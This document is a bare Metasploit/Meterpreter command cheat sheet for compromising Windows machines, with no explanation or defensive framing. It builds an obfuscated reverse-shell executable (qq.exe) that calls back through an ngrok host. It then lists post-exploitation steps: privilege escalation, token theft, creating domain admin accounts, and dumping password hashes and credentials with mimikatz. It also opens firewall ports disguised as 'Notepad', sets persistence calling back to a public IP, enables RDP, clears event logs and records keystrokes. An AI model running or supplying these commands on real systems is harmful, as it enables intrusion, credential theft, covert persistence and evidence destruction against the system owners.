meterpreter Command Sample
==================================================================================================
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=free.ngrok.cc LPORT=10678 -f c
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=free.ngrok.cc LPORT=10678 -f exe -o qq.exe
upx -5 qq.exe -k
==================================================================================================
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.195.45
set lport 10678
set ExitOnSession false
set AutorunScript post/windows/manage/smart_migrate
exploit -j -z
jobs
sessions -i 1
sysinfo
screenshot
getuid
getsystem
getuid
run post/windows/manage/priv_migrate
background
ps
steal_token PID
drop_token
getuid
use incognito
help incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\USERNAME
add_user domainuser password -h 192.168.195.191
add_group_user "Domain Admins" domainuser -h 192.168.195.191
run post/windows/gather/smart_hashdump
# http://www.objectif-securite.ch/en/ophcrack.php
use mimikatz
help mimikatz
msv
ssp
kerberos
wdigest
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/dumplinks
run post/windows/gather/usb_history
run post/windows/gather/enum_devices
execute -f cmd.exe -i -H -t
net user username userpass /add
net localgroup "Administrators" username /add
net user domainuser userpass /add /DOMAIN
net group "Domain Admins" domainuser /add /DOMAIN
netsh firewall add portopening TCP 10678 "Notepad" ENABLE ALL
netsh firewall add portopening TCP 19655 "Notepad" ENABLE ALL
exit
run metsvc
run persistence -X -i 10 -p 10678 -r 47.90.92.56
run post/windows/manage/enable_rdp
run getgui -e
run getgui -u username -p userpass
# rdesktop -u username -p userpass server[:port]
clearev
run post/windows/capture/keylog_recorder
==================================================================================================